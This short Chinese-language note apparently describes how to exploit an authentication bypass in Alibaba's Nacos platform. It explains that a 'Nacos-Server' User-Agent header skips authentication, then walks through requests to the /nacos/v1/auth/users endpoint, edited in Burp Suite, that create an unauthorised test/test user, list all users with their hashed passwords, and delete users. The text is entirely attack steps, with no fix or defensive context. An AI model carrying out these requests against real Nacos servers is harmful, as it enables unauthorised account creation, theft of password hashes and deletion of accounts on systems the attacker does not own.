Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过;nacos.core.auth.enabled=true;鉴权认证;从而进行API操作。
访问http://xxxxx/nacos/v1/auth/users?username=test&password=test ;并使用burpsuite进行抓包;将方法改为POST;返回“create user ok”即可未授权创建一个test/test的用户;使用创建用户即可登入系统
访问http://xxxxxxx/nacos/v1/auth/users?pageNo=1&pageSize=999 即可获取当前nacos系统存在的用户以及加密后的密码。
访问http://xxxxxxxx/nacos/v1/auth/users?username=test;并使用burpsuite进行抓包;将方法改为DELETE;返回“delete user ok”即可未授权删除test的用户